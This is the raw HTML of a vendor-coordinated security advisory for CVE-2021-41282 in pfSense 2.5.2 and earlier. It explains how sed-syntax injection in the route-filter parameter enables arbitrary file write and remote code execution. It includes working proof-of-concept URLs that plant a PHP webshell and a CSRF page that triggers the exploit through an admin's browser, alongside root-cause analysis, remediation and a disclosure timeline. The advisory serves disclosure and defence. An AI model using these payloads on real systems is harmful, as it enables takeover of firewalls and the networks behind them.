CINXE.COM
Shielder - Remote Code Execution in pfSense <= 2.5.2
<!doctype html><html lang=en><head><meta charset=utf-8><meta name=viewport content="width=device-width,initial-scale=1,shrink-to-fit=no"><meta name=description content="pfSense <= 2.5.2 allows authenticated users to inject arbitrary sed-specific code, which leads to an Arbitrary File Write, resulting in a Remote Code Execution. The vulnerability is also exploitable through a Cross-Site Request Forgery."><meta name=Copyright content="Copyright © Shielder"><meta property="og:title" content="Shielder - Remote Code Execution in pfSense <= 2.5.2"><meta property="og:type" content="article"><meta property="og:url" content="https://www.shielder.com/advisories/pfsense-remote-command-execution/"><meta property="og:image" content="https://www.shielder.com//img/advisory.png"><meta property="og:image:type" content="image/png"><meta property="og:image:width" content="225"><meta property="og:image:height" content="225"><meta property="og:image:alt" content="advisory"><meta property="og:locale" content="en_US"><meta property="og:description" content="pfSense <= 2.5.2 allows authenticated users to inject arbitrary sed-specific code, which leads to an Arbitrary File Write, resulting in a Remote Code Execution. The vulnerability is also exploitable through a Cross-Site Request Forgery."><meta property="og:site_name" content="Shielder"><meta property="fb:app_id" content="1651492201761174"><meta name=twitter:card content="summary"><meta name=twitter:site content="@ShielderSec"><meta name=twitter:creator content="@ShielderSec"><meta name=twitter:title content="Shielder - Remote Code Execution in pfSense <= 2.5.2"><meta name=twitter:description content="pfSense <= 2.5.2 allows authenticated users to inject arbitrary sed-specific code, which leads to an Arbitrary File Write, resulting in a Remote Code Execution. The vulnerability is also exploitable through a Cross-Site Request Forgery."><meta name=twitter:image content="https://www.shielder.com//img/advisory.png"><link rel=apple-touch-icon sizes=57x57 href=https://www.shielder.com/favicon/apple-touch-icon-57x57.png><link rel=apple-touch-icon sizes=60x60 href=https://www.shielder.com/favicon/apple-touch-icon-60x60.png><link rel=apple-touch-icon sizes=72x72 href=https://www.shielder.com/favicon/apple-touch-icon-72x72.png><link rel=apple-touch-icon sizes=76x76 href=https://www.shielder.com/favicon/apple-touch-icon-76x76.png><link rel=apple-touch-icon sizes=114x114 href=https://www.shielder.com/favicon/apple-touch-icon-114x114.png><link rel=apple-touch-icon sizes=120x120 href=https://www.shielder.com/favicon/apple-touch-icon-120x120.png><link rel=apple-touch-icon sizes=144x144 href=https://www.shielder.com/favicon/apple-touch-icon-144x144.png><link rel=apple-touch-icon sizes=152x152 href=https://www.shielder.com/favicon/apple-touch-icon-152x152.png><link rel=apple-touch-icon sizes=167x167 href=https://www.shielder.com/favicon/apple-touch-icon-167x167.png><link rel=apple-touch-icon sizes=180x180 href=https://www.shielder.com/favicon/apple-touch-icon-180x180.png><link rel=icon type=image/png href=https://www.shielder.com/favicon/favicon-16x16.png sizes=16x16><link rel=icon type=image/png href=https://www.shielder.com/favicon/favicon-32x32.png sizes=32x32><link rel=icon type=image/png href=https://www.shielder.com/favicon/favicon-96x96.png sizes=96x96><link rel=icon type=image/png href=https://www.shielder.com/favicon/favicon-160x160.png sizes=160x160><link rel=icon type=image/png href=https://www.shielder.com/favicon/favicon-192x192.png sizes=192x192><link rel="shortcut icon" href=https://www.shielder.com/favicon/favicon.ico><link rel=preload href=https://www.shielder.com/fontawesome/webfonts/fa-regular-400.woff2 as=font type=font/woff2 crossorigin><link rel=preload href=https://www.shielder.com/fontawesome/webfonts/fa-solid-900.woff2 as=font type=font/woff2 crossorigin><link rel=preload href=https://www.shielder.com/fontawesome/webfonts/fa-brands-400.woff2 as=font type=font/woff2 crossorigin><link rel=preload href=https://www.shielder.com/fontawesome/webfonts/fa-brands-400.woff2 as=font type=font/woff2 crossorigin><title>Shielder - Remote Code Execution in pfSense <= 2.5.2 </title><link rel=stylesheet defer href=https://www.shielder.com/css/bootstrap.min.css><link rel=stylesheet defer href=https://www.shielder.com/css/style.css><link rel=stylesheet async href=https://www.shielder.com/fontawesome/css/all.min.css><link rel=stylesheet async href=https://www.shielder.com/css/dracula.css><link rel=alternate type=application/rss+xml title="Shielder Blog" href=https://www.shielder.com/blog/index.xml><link rel=alternate type=application/rss+xml title="Shielder Advisories" href=https://www.shielder.com/advisories/index.xml></head><body><nav class="navbar navbar-expand-lg fixed-top bg-primary p-3 px-md-5 px-lg-3 px-xl-5"><a class=navbar-brand href=https://www.shielder.com/ title=homepage><img src=https://www.shielder.com/img/logoshielder.svg alt="shielder logo homepage" class=w-75></a> <button class="navbar-toggler text-white p-0" type=button data-toggle=collapse data-target=#navbarNav aria-controls=navbarNav aria-expanded=false aria-label="Toggle navigation"> <i class="fas fa-bars"></i></button><div class="collapse navbar-collapse justify-content-end pt-2" id=navbarNav><ul class=navbar-nav><li class="nav-item p-2"><a class="nav-link text-white" href=https://www.shielder.com/ title=Home>Home</a></li><li class="nav-item p-2"><a class="nav-link text-white" href=https://www.shielder.com/company title=Company>Company</a></li><li class="nav-item p-2"><a class="nav-link text-white" href=https://www.shielder.com/services title=Services>Services</a></li><li class="nav-item p-2"><a class="nav-link text-white" href=https://www.shielder.com/advisories title=Advisories>Advisories</a></li><li class="nav-item p-2"><a class="nav-link text-white" href=https://www.shielder.com/blog title=Blog>Blog</a></li><li class="nav-item p-2"><a class="nav-link text-white" href=https://www.shielder.com/careers title=Careers>Careers</a></li><li class="nav-item p-2"><a class="nav-link text-white" href=https://www.shielder.com/contacts title=Contacts>Contacts</a></li><li class="nav-item p-2"><button class="nav-link bg-transparent border-0 btn btn-primary dropdown-toggle rounded-0" type=button id=language-selector data-toggle=dropdown aria-haspopup=true aria-expanded=false> ENG</button><div class="dropdown-menu dropdown-menu-right" aria-labelledby=language-selector><a class=dropdown-item href=https://www.shielder.com/advisories/pfsense-remote-command-execution/ title=ENG>ENG</a> <a class=dropdown-item href=https://www.shielder.com/it/advisories/pfsense-remote-command-execution/ title=ITA>ITA</a></div></li></ul></div></nav><section id=single-advisory class="bg-primary text-white"><div class=container><div class=row><div class="col-12 col-lg-8"><h1 id=remote-code-execution-in-pfsense--252>Remote Code Execution in pfSense <= 2.5.2</h1><h2 id=summary>Summary</h2><p>pfSense allows authenticated users to get information about the routes set in the firewall. The information are retrieved by executing the <code>netstat</code> utility and then its output is parsed via the <code>sed</code> utility. While the common prevention patterns for command injections (i.e. the usage of the <code>escapeshellarg</code> function for the arguments) are in use, it is still possible to inject <code>sed</code>-specific code and write an arbitrary file in an arbitrary location. This vulnerability could be also exploited pre-authentication as the vulnerable endpoint is also vulnerable to a Cross-Site Request Forgery (CSRF).</p><h2 id=product-description-from-vendor>Product Description (from vendor)</h2><p>pfSense® Plus software is the world’s most trusted firewall. The software has garnered the respect and adoration of users worldwide - installed well over three million times. Made possible by open source technology. Made into a robust, reliable, dependable product by Netgate.</p><h2 id=cves>CVE(s)</h2><ul><li><a href="https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-41282" target=_blank rel="noopener noreferrer">CVE-2021-41282</a></li></ul><h2 id=details>Details</h2><h3 id=root-cause-analysis>Root Cause Analysis</h3><p>pfSense while trying to show the routes set in the firewall executes the <code>sed</code> utility with some user-controllable input.<br><code>sed</code> - a stream editor - is a powerful utility to perform text transformations and has quite a lot of commands which could be defined as a single command line argument semicolon-separated. The ability of adding multiple commands in one argument is the key for this vulnerability.</p><p>What is important to specify before diving into the exploitation details is that pfSense is based on FreeBSD, so all the GNU-specific arguments of <code>sed</code> (e.g. the <code>e</code>/<code>exec</code> argument which could be used to run a system command) are not available.</p><p>An excerpt of the <a href=https://github.com/pfsense/pfsense/blob/a7086b04cae21ca742fdeefd1019ee1401b6dded/src/usr/local/www/diag_routes.php#L35-L65 target=_blank rel="noopener noreferrer">vulnerable code</a> follows:</p><div class=highlight><div class=chroma><table class=lntable><tr><td class=lntd><pre tabindex=0 class=chroma><code><span class=lnt> 1 </span><span class=lnt> 2 </span><span class=lnt> 3 </span><span class=lnt> 4 </span><span class=lnt> 5 </span><span class=lnt> 6 </span><span class=lnt> 7 </span><span class=lnt> 8 </span><span class=lnt> 9 </span><span class=lnt>10 </span><span class=lnt>11 </span><span class=lnt>12 </span><span class=lnt>13 </span><span class=lnt>14 </span><span class=lnt>15 </span><span class=lnt>16 </span><span class=lnt>17 </span><span class=lnt>18 </span><span class=lnt>19 </span><span class=lnt>20 </span><span class=lnt>21 </span><span class=lnt>22 </span><span class=lnt>23 </span><span class=lnt>24 </span><span class=lnt>25 </span><span class=lnt>26 </span><span class=lnt>27 </span><span class=lnt>28 </span><span class=lnt>29 </span><span class=lnt>30 </span><span class=lnt>31 </span></code></pre></td><td class=lntd><pre tabindex=0 class=chroma><code class=language-php data-lang=php><span class=line><span class=cl><span class=mi>35</span> <span class=k>if</span> <span class=p>(</span><span class=nx>isset</span><span class=p>(</span><span class=nv>$_REQUEST</span><span class=p>[</span><span class=s1>'isAjax'</span><span class=p>]))</span> <span class=p>{</span> </span></span><span class=line><span class=cl><span class=mi>36</span> <span class=k>require_once</span><span class=p>(</span><span class=s1>'auth_check.inc'</span><span class=p>);</span> </span></span><span class=line><span class=cl><span class=mi>37</span> </span></span><span class=line><span class=cl><span class=mi>38</span> <span class=nv>$netstat</span> <span class=o>=</span> <span class=s2>"/usr/bin/netstat -rW"</span><span class=p>;</span> </span></span><span class=line><span class=cl><span class=mi>39</span> <span class=k>if</span> <span class=p>(</span><span class=nx>isset</span><span class=p>(</span><span class=nv>$_REQUEST</span><span class=p>[</span><span class=s1>'IPv6'</span><span class=p>]))</span> <span class=p>{</span> </span></span><span class=line><span class=cl><span class=mi>40</span> <span class=nv>$netstat</span> <span class=o>.=</span> <span class=s2>" -f inet6"</span><span class=p>;</span> </span></span><span class=line><span class=cl><span class=mi>41</span> <span class=k>echo</span> <span class=s2>"IPv6</span><span class=se>\n</span><span class=s2>"</span><span class=p>;</span> </span></span><span class=line><span class=cl><span class=mi>42</span> <span class=p>}</span> <span class=k>else</span> <span class=p>{</span> </span></span><span class=line><span class=cl><span class=mi>43</span> <span class=nv>$netstat</span> <span class=o>.=</span> <span class=s2>" -f inet"</span><span class=p>;</span> </span></span><span class=line><span class=cl><span class=mi>44</span> <span class=k>echo</span> <span class=s2>"IPv4</span><span class=se>\n</span><span class=s2>"</span><span class=p>;</span> </span></span><span class=line><span class=cl><span class=mi>45</span> </span></span><span class=line><span class=cl><span class=mi>46</span> <span class=p>}</span> </span></span><span class=line><span class=cl><span class=mi>47</span> <span class=k>if</span> <span class=p>(</span><span class=o>!</span><span class=nx>isset</span><span class=p>(</span><span class=nv>$_REQUEST</span><span class=p>[</span><span class=s1>'resolve'</span><span class=p>]))</span> <span class=p>{</span> </span></span><span class=line><span class=cl><span class=mi>48</span> <span class=nv>$netstat</span> <span class=o>.=</span> <span class=s2>" -n"</span><span class=p>;</span> </span></span><span class=line><span class=cl><span class=mi>49</span> <span class=p>}</span> </span></span><span class=line><span class=cl><span class=mi>50</span> </span></span><span class=line><span class=cl><span class=mi>51</span> <span class=k>if</span> <span class=p>(</span><span class=o>!</span><span class=k>empty</span><span class=p>(</span><span class=nv>$_REQUEST</span><span class=p>[</span><span class=s1>'filter'</span><span class=p>]))</span> <span class=p>{</span> </span></span><span class=line><span class=cl><span class=mi>52</span> <span class=nv>$netstat</span> <span class=o>.=</span> <span class=s2>" | /usr/bin/sed -e "</span> <span class=o>.</span> <span class=nx>escapeshellarg</span><span class=p>(</span><span class=s2>"1,3d; 5,</span><span class=se>\$</span><span class=s2> { /"</span> <span class=o>.</span> <span class=nx>htmlspecialchars</span><span class=p>(</span><span class=nv>$_REQUEST</span><span class=p>[</span><span class=s1>'filter'</span><span class=p>])</span> <span class=o>.</span> <span class=s2>"/!d; };"</span><span class=p>);</span> </span></span><span class=line><span class=cl><span class=mi>53</span> <span class=p>}</span> <span class=k>else</span> <span class=p>{</span> </span></span><span class=line><span class=cl><span class=mi>54</span> <span class=nv>$netstat</span> <span class=o>.=</span> <span class=s2>" | /usr/bin/sed -e '1,3d'"</span><span class=p>;</span> </span></span><span class=line><span class=cl><span class=mi>55</span> <span class=p>}</span> </span></span><span class=line><span class=cl><span class=mi>56</span> </span></span><span class=line><span class=cl><span class=mi>57</span> <span class=k>if</span> <span class=p>(</span><span class=nx>is_numeric</span><span class=p>(</span><span class=nv>$_REQUEST</span><span class=p>[</span><span class=s1>'limit'</span><span class=p>])</span> <span class=o>&&</span> <span class=nv>$_REQUEST</span><span class=p>[</span><span class=s1>'limit'</span><span class=p>]</span> <span class=o>></span> <span class=mi>0</span><span class=p>)</span> <span class=p>{</span> </span></span><span class=line><span class=cl><span class=mi>58</span> <span class=nv>$_REQUEST</span><span class=p>[</span><span class=s1>'limit'</span><span class=p>]</span><span class=o>++</span><span class=p>;</span> <span class=c1>// Account for the header line </span></span></span><span class=line><span class=cl><span class=c1></span><span class=mi>59</span> <span class=nv>$netstat</span> <span class=o>.=</span> <span class=s2>" | /usr/bin/head -n </span><span class=si>{</span><span class=nv>$_REQUEST</span><span class=p>[</span><span class=s1>'limit'</span><span class=p>]</span><span class=si>}</span><span class=s2>"</span><span class=p>;</span> </span></span><span class=line><span class=cl><span class=mi>60</span> <span class=p>}</span> </span></span><span class=line><span class=cl><span class=mi>61</span> </span></span><span class=line><span class=cl><span class=mi>62</span> <span class=k>echo</span> <span class=nx>htmlspecialchars_decode</span><span class=p>(</span><span class=nx>shell_exec</span><span class=p>(</span><span class=nv>$netstat</span><span class=p>));</span> </span></span><span class=line><span class=cl><span class=mi>63</span> </span></span><span class=line><span class=cl><span class=mi>64</span> <span class=k>exit</span><span class=p>;</span> </span></span><span class=line><span class=cl><span class=mi>65</span> <span class=p>}</span> </span></span></code></pre></td></tr></table></div></div><p>At line 51-52 it could be seen that if the request contains a <code>filter</code> parameter then its HTML special characters are converted to their HTML entities. Then the input is prefixed and suffixed by some hard-coded <code>sed</code> syntax, and finally everything is escaped by the <a href=https://www.php.net/manual/en/function.escapeshellarg.php target=_blank rel="noopener noreferrer"><code>escapeshellarg</code></a> function, which prevents sub-commands or other arguments from being injected. At line 62 the command is finally executed.</p><p>As mentioned before it is possible to inject arbitrary <code>sed</code> syntax, having the only limitation that the input is encoded via the <a href=https://www.php.net/manual/en/function.htmlspecialchars.php target=_blank rel="noopener noreferrer"><code>htmlspecialchars</code></a> function. This allows to use the <code>s/match/replace/</code> command to replace part of the <code>netstat</code> output with an arbitrary string and the <code>w /path/to/file</code> command to write the output of the <code>sed</code> command to an arbitrary location.</p><p>Wrapping everything together an attacker could set in the filter parameter the following string: <code>.*/!d;};s/Destination/\x3c\x3fphp+system($_GET[\x22a\x22])\x3b\x3f\x3e/;w+/usr/local/www/a.php%0a%23</code> Which will result in the following command to be run:</p><pre tabindex=0><code>/usr/bin/netstat -rW -f inet | /usr/bin/sed -e '1,3d; 5,\$ { /!d;};s/Destination/\x3c\x3fphp system($_GET[\x22a\x22])\x3b\x3f\x3e/;w /usr/local/www/a.php #/!d; };' </code></pre><p>As the <code>netstat</code> utility always outputs the <code>Destination</code> string, it was chosen to be replaced with <code><?php system($_GET["a"]);?></code> and then the output is written to <code>/usr/local/www/a.php</code>.</p><h3 id=proof-of-concept>Proof of Concept</h3><ol><li>Login to pfSense</li><li>Visit the following URL by replacing <code><target></code> with the IP address / domain of the target pfSense instance: <code>http://<target>/diag_routes.php?isAjax=1&filter=.*/!d;};s/Destination/\x3c\x3fphp+system($_GET[\x22a\x22])\x3b\x3f\x3e/;w+/usr/local/www/a.php%0a%23</code></li><li>Visit the following URL by replacing <code><target></code> with the IP address / domain of the target pfSense instance and notice that the <code>id</code> command has been executed: <code>http://<target>/a.php?a=id</code></li></ol><h3 id=impact>Impact</h3><p>An authenticated attacker could write an arbitrary file to the pfSense disk. This can be abused to write a webshell to execute arbitrary code / commands.</p><p>It should be noted that due to a lack of Cross-Site Request Forgery (CSRF) protections for the vulnerable endpoint it is possible for an attacker to trick an authenticated admin into visiting a malicious website to exploit the vulnerability through the victim’s session/browser. More details are available in the Cross-Site Request Forgery advisory.</p><p>A proof of concept to exploit the vulnerability through the CSRF follows:</p><ol><li>Login to pfSense</li><li>Create an HTML file with the following content by replacing <code><target></code> with the IP address / domain of the target pfSense instance:</li></ol><div class=highlight><div class=chroma><table class=lntable><tr><td class=lntd><pre tabindex=0 class=chroma><code><span class=lnt>1 </span><span class=lnt>2 </span><span class=lnt>3 </span><span class=lnt>4 </span></code></pre></td><td class=lntd><pre tabindex=0 class=chroma><code class=language-html data-lang=html><span class=line><span class=cl><span class=p><</span><span class=nt>meta</span> <span class=na>name</span><span class=o>=</span><span class=s>"referrer"</span> <span class=na>content</span><span class=o>=</span><span class=s>"no-referrer"</span><span class=p>></span> </span></span><span class=line><span class=cl><span class=p><</span><span class=nt>script</span><span class=p>></span> </span></span><span class=line><span class=cl><span class=nb>window</span><span class=p>.</span><span class=nx>location</span> <span class=o>=</span> <span class=s2>"http://<target>/diag_routes.php?isAjax=1&filter=.*/!d;};s/Destination/\\x3cscript\\x3eif\\x28location.pathname\\x21\\x3d\\x27\\x2fa.php\\x27\\x29\\x7blocation\\x3d\\x27\\x2fa.php\\x3fa\\x3did\\x27\\x7d\\x3c\\x2fscript\\x3e\\x3c\\x3fphp+system($_GET[\\x22a\\x22])\\x3b\\x3f\\x3e/;w+/usr/local/www/a.php%0a%23"</span> </span></span><span class=line><span class=cl><span class=p></</span><span class=nt>script</span><span class=p>></span> </span></span></code></pre></td></tr></table></div></div><ol start=3><li>Visit the following URL by replacing <code><target></code> with the IP address / domain of the target pfSense instance and notice the 404 error: <code>http://<target>/a.php?a=id</code></li><li>Host the HTML page created at step 2 on a webserver and visit it in the same browser used for the other steps</li><li>Notice that the Arbitrary File Write has been exploited to create a webshell in <code>/usr/local/www/a.php</code> and the victim is redirected to the webshell (<code>http://<target>/a.php?a=id</code>) to execute the <code>id</code> command</li></ol><h3 id=remediation>Remediation</h3><p>Upgrade pfSense CE to version 2.6.0 or pfSense Plus to version 22.01.</p><h2 id=disclosure-timeline>Disclosure Timeline</h2><ul><li>12/08/2021: Submission to <a href=mailto:security@netgate.com>security@netgate.com</a></li><li>13/08/2021: pfSense published the fix for the RCE on Github: <a href=https://github.com/pfsense/pfsense/commit/72ea2b69cc111d4bc8ebf1ccf1e1529923c5b88a target=_blank rel="noopener noreferrer">https://github.com/pfsense/pfsense/commit/72ea2b69cc111d4bc8ebf1ccf1e1529923c5b88a</a></li><li>16/08/2021: Shielder reported a ReDoS in the implemented fix and the lack of a fix for the CSRF</li><li>16/08/2021: pfSense published the first attempt to fix the ReDoS and fix for the CSRF on Github: <a href=https://github.com/pfsense/pfsense/commit/57a737f172b7baaa6ae0f23e8aef2f93ad851054 target=_blank rel="noopener noreferrer">https://github.com/pfsense/pfsense/commit/57a737f172b7baaa6ae0f23e8aef2f93ad851054</a></li><li>17/08/2021: Shielder reported a bypass for the ReDoS fix</li><li>17/08/2021: pfSense published the second attempt to fix the ReDos on Github: <a href=https://github.com/pfsense/pfsense/commit/8cd3f92f2443a6f0e4b7964a9532f761f808a0c6 target=_blank rel="noopener noreferrer">https://github.com/pfsense/pfsense/commit/8cd3f92f2443a6f0e4b7964a9532f761f808a0c6</a></li><li>17/08/2021: Shielder reported yet-another-bypass™️ for the ReDoS fix</li><li>18/08/2021: pfSense published the final fix for the ReDoS on Github: <a href=https://github.com/pfsense/pfsense/commit/cf757a8094762ede47861fc073eaba06355c6bfc target=_blank rel="noopener noreferrer">https://github.com/pfsense/pfsense/commit/cf757a8094762ede47861fc073eaba06355c6bfc</a></li><li>15/09/2021: Shielder requested the CVE</li><li>06/10/2021: Shielder asked for update about the publication time of the fixed version</li><li>06/10/2021: pfSense shared the ETA for the update - Jan 2022</li><li>14/02/2022: psSense published the fixed version</li><li>23/02/2022: Shielder’s advisory is made public</li></ul><h2 id=credits>Credits</h2><ul><li>Abdel Adim `<a href=https://twitter.com/smaury92 target=_blank rel="noopener noreferrer">smaury</a>` Oisfi of Shielder</li></ul><p class="font-weight-bold smaller mt-4">This advisory was first published on https://www.shielder.com/advisories/pfsense-remote-command-execution/</p></div><div class="col-12 col-lg-3 offset-lg-1 order-first order-lg-last mb-5 mb-lg-0"><div class=row><div class="col-12 my-4"><p class=mb-0><i class="fas fa-folder text-primary pr-2"></i> <span class="badge badge-pill border text-muted border-primary text-uppercase mb-2 mr-1"><a class="smaller text-decoration-none text-muted" href=/types/advisory>Advisory</a></span></p></div><div class="col-12 mb-4"><p class="text-muted text-uppercase smaller mb-1">Date</p><p class="font-weight-bold text-uppercase mb-0">23 February 2022</p></div></div></div></div></div></section><footer class="pt-5 pb-4 px-3 px-md-0"><div class=container><div class="row text-center"><div class="col-12 col-lg-4 text-white border-bottom mb-4 pb-lg-0 mb-lg-0"><p class="text-uppercase font-weight-bold">Info</p><p class=footer-info>Shielder S.p.A.</p><p class=footer-info>P.I. 11435310013</p><p class=footer-info>REA TO - 1213132</p><p class=footer-info>Registered Capital: 81.000,00 €</p><p><a class="text-decoration-none text-white" target=_blank rel=noopener href="https://www.google.it/maps/place/Shielder/@44.8833849,7.3303863,17z/data=!3m1!4b1!4m5!3m4!1s0x4788250440849fa5:0x74cf10f2092abc85!8m2!3d44.8833849!4d7.332575" title="corporate headquarters">Via Palestro, 1/C<br>10064 Pinerolo (TO) Italy</a></p><div class="iso-logos row justify-content-center mb-4 pb-lg-0 mb-lg-0"><div class=col-3><img alt=ISO27001 src=/img/iso27001.png></div><div class=col-3><img alt=ISO9001 src=/img/iso9001.png></div></div></div><div class="col-12 col-lg-4 text-white border-bottom mb-4 pb-lg-0 mb-lg-0"><p class="text-uppercase font-weight-bold">Contacts</p><p class=footer-contact><a class="text-decoration-none text-white" href=mailto:info@shielder.com title="email Shielder">info@shielder.com</a></p><p class=footer-contact>Landline: <a class="text-decoration-none text-white" href=tel:+390121393642 title=Landline>(+39) 0121 - 39 36 42</a></p><p class=footer-contact>Commercial: <a class="text-decoration-none text-white" href=tel:+393453031983 title=Commercial>(+39) 345 - 30 31 983</a></p><p class=footer-contact>Technical: <a class="text-decoration-none text-white" href=tel:+393931666814 title=Technical>(+39) 393 - 16 66 814</a></p><p><span><a href=https://twitter.com/ShielderSec title="Shielder Twitter profile" target=_blank rel="noopener me" class=text-white><i class="fab fa-x-twitter bigger-icon"></i></a> </span><span class=pl-3><a href=https://infosec.exchange/@Shielder title="Shielder Mastodon profile" target=_blank rel="noopener me" class=text-white><i class="fab fa-mastodon bigger-icon"></i></a> </span><span class=px-3><a href=https://www.linkedin.com/company/shielder title="Shielder LinkedIn profile" target=_blank rel="noopener me" class=text-white><i class="fab fa-linkedin bigger-icon"></i></a> </span><span><a href=https://github.com/shieldersec title="Shielder Github profile" target=_blank rel="noopener me" class=text-white><i class="fab fa-github bigger-icon"></i></a></span></p></div><div class="col-12 col-lg-4 text-white mb-4 pb-lg-0 mb-lg-0"><p class="text-uppercase font-weight-bold">Sitemap</p><p><a class="text-decoration-none text-white" title=Home href=https://www.shielder.com/>Home</a></p><p><a class="text-decoration-none text-white" title=Company href=https://www.shielder.com/company>Company</a></p><p><a class="text-decoration-none text-white" title=Services href=https://www.shielder.com/services>Services</a></p><p><a class="text-decoration-none text-white" title=Advisories href=https://www.shielder.com/advisories>Advisories</a></p><p><a class="text-decoration-none text-white" title=Blog href=https://www.shielder.com/blog>Blog</a></p><p><a class="text-decoration-none text-white" title=Careers href=https://www.shielder.com/careers>Careers</a></p><p><a class="text-decoration-none text-white" title=Contacts href=https://www.shielder.com/contacts>Contacts</a></p></div><div class="col-12 mt-5"><span class="mb-2 mb-lg-0 border-md-right pr-2 text-white d-block d-lg-inline">Copyright © Shielder 2014 - 2025</span> <span class="mb-2 mb-lg-0 border-md-right pr-2 pl-1 text-white d-block d-lg-inline"><a class="text-decoration-none text-white" href=/disclosure-policy title="Disclosure Policy">Disclosure policy</a></span> <span class="mb-2 mb-lg-0 pr-2 pl-1 text-white d-block d-lg-inline"><a class="text-decoration-none text-white" href=/privacy-policy title="Privacy Policy">Privacy policy</a></span></div></div></div></footer><script src=https://www.shielder.com/js/jquery.min.js></script><script src=https://www.shielder.com/js/app.js></script><script src=https://www.shielder.com/js/bootstrap.bundle.min.js></script></body></html>